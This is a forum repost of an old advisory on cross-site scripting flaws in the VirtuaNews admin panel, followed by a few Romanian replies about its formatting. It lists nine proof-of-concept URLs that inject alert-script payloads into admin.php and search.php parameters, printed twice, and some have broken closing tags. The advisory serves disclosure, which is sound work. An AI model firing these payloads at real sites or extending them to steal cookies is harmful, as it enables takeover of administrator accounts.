Cross Site Scripting Vulnerabillity (

[zbeng]

1) Introduction

2) Bug

3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============

1) Introduction

===============

VirtuaNews Admin Panel is a good administration software. Many

administrators choose it

to be their "safe door", therefore it should strong and safe. The main risk

describes in this

advisory is the harm that could be done to the administration staff. When

the vulnerabilities

concerns the staff it is more dangerous that harming users, because if a

staff's member cookie

is stolen, the attackers can take over the website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======

2) Bug

======

The Vulnerabillity is Cross Site Scripting. If an attacker will request any

of the following

urls from the server:

http://<host>/admin.php?"><script>alert('XSS')script>

http://<host>/forum/search.php?do=process&showposts=0&query=<script>alert('X

SS')script>

http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&main

news=~~~~"></textarea><script>alert('XSS')script>

http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&main

news=~~~~"></textarea>--><script>alert('XSS')script>

http://<host>/admin.php?">action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&ma

innews=~~~~"></textarea><script>alert('XSS')script>

http://<host>/admin.php?action=files&expand="><script>alert('XSS')script>

http://<host>/admin.php?action=files_cat_delete&id="><script>alert('XSS')</s

cript>

http://<host>/admin.php?action=files_check&catid="><script>alert('XSS')</scr

ipt>

http://<host>/admin.php?action=newslogo_upload&"><script>alert('XSS')</scrip

t>

XSS appears and the server allows an attacker to inject & execute scripts.

In the words of securityfocus.com :

~~~~~~~~~~~~~~~~~~~~~~~~~~

If all of these circumstances are met, an attacker may be able to exploit

this issue

via a malicious link containing arbitrary HTML and script code as part of

the hostname.

When the malicious link is clicked by an unsuspecting user, the

attacker-supplied HTML

and script code will be executed by their web client. This will occur

because the server

will echo back the malicious hostname supplied in the client's request,

without sufficiently

escaping HTML and script code.

Attacks of this nature may make it possible for attackers to manipulate web

content or to

steal cookie-based authentication credentials. It may be possible to take

arbitrary actions as the victim user.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========

3) The Code

===========

http://<host>/admin.php?"><script>alert('XSS')script>

http://<host>/forum/search.php?do=process&showposts=0&query=<script>alert('X

SS')script>

http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&main

news=~~~~"></textarea><script>alert('XSS')script>

http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&main

news=~~~~"></textarea>--><script>alert('XSS')/script>

http://<host>/admin.php?">action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&ma

innews=~~~~"></textarea><script>alert('XSS')script>

http://<host>/admin.php?action=files&expand="><script>alert('XSS')script>

http://<host>/admin.php?action=files_cat_delete&id="><script>alert('XSS')</s

cript>

http://<host>/admin.php?action=files_check&catid="><script>alert('XSS')</scr

ipt>

http://<host>/admin.php?action=newslogo_upload&"><script>alert('XSS')</scrip

t>

[ping]

:roll:

[Zeus]

...nu ii asa palpitant sa citesti un post dupa nenumarate clickuri...

[virusz]

+ parca erau 3 parti:

1) Introduction

2) Bug

3) The Code

..sus is numa 2 din care doar una e cmpleta .... plz edit